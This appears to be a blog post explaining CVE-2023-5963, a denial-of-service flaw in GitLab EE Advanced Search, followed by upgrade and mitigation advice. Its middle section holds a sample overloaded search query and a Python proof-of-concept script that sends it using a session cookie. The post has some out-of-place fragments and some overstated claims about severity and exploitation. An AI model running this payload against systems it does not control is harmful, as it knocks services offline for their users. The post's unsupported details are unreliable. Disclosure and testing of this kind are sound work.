CVE-2023-5963 is a recently identified vulnerability that affects GitLab’s Enterprise Edition (EE) — specifically, its Advanced Search feature. If you’re running any version from 13.9 to 16.3.6, version 16.4 before 16.4.2, or version 16.5 before 16.5.1, your environment may be at risk.

In this post, I’ll break down what happened, how the vulnerability works, and share a code example to demonstrate the core issue — all in straightforward, accessible language. We'll also cover how you can protect your GitLab instance and link out to official resources.

What Is CVE-2023-5963?

CVE-2023-5963 is a Denial of Service (DoS) vulnerability discovered in GitLab EE’s Advanced Search functionality. An attacker can abuse the way the search parser works by chaining a large number of syntax operators (like AND, OR, etc.) in a single search query. This eats up server resources and could slow or even crash your GitLab instance.

This bug only affects GitLab’s Enterprise Edition with Advanced Search enabled (which usually means instances running Elasticsearch).

A (Simplified) Vulnerable Search Query

Here’s a high-level view of what this attack looks like. All you need to do is send a search query packed with repeated boolean operators:

label:bug OR label:feature OR label:ui OR label:backend OR label:test OR label:security OR label:api OR label:frontend OR label:performance OR label:documentation OR label:infrastructure OR ... (repeat this pattern hundreds or thousands of times)

By chaining hundreds or thousands of OR or AND operators together, you force the server to try and parse and process a massive boolean tree—something that can quickly eat up RAM and CPU, possibly causing the GitLab web application to crash or become unresponsive.

A basic proof-of-concept can be written in Python to send a payload via the GitLab API

import requests

GITLAB_URL = "https://your.gitlab.instance";
SEARCH_ENDPOINT = "/search"
COOKIES = {'_gitlab_session': 'YOUR_SESSION_COOKIE'}
HEADERS = {'Content-Type': 'application/x-www-form-urlencoded'}

# Build a long, malicious query string
base_label = "label:bug"
or_chain = " OR ".join([base_label for _ in range(100)])  # 100 chained ORs

payload = {
    'search': or_chain,
    'scope': 'issues'  # scope or type of content being searched
}

response = requests.get(
    GITLAB_URL + SEARCH_ENDPOINT,
    params=payload,
    headers=HEADERS,
    cookies=COOKIES,
)

print(response.status_code)
print(response.text)

*Note: Do not run this script against anyone’s server without permission! Use this only to test your own instance.*

The server spends lots of processing power parsing and evaluating complex search expressions.

- High CPU/RAM usage can cause the whole web frontend to become unresponsive for all users (a denial of service).
- In a worst-case scenario, repeated abuse could require a restart of application services or even the server.

gitlab-rake gitlab:env:info

`

---

## How to Fix It

Upgrade to one of the patched versions:
- 16.3.6 or later
- 16.4.2 or later
- 16.5.1 or later

GitLab released security patches for all supported versions.
See the advisory:
- GitLab Security Release: 16.5.1, 16.4.2, and 16.3.6

---

## Mitigations

If you can’t immediately upgrade:
- Restrict access to Advanced Search, if possible (at least for users you don’t trust).
- Monitor for unusual search activity or frequent, long-running queries.
- Rate limit user searches using proxy/firewall rules if your environment allows.

---

## References

- GitLab Security Advisory for CVE-2023-5963
- CVE Details for CVE-2023-5963
- GitLab Advanced Search Documentation

---

## Summary

CVE-2023-5963 is a critical vulnerability that lets anyone bring down your GitLab EE server (with Advanced Search enabled) just by sending an overloaded search query. Attackers exploited how GitLab handled endless chains of search operators, and GitLab has since patched the bug. Protect yourself by upgrading immediately, monitoring your server, and taking interim precautions if you’re using an affected version.

Stay safe — keep your software up to date!

Timeline

Published on: 11/06/2023 13:15:10 UTC
Last modified on: 11/14/2023 17:51:28 UTC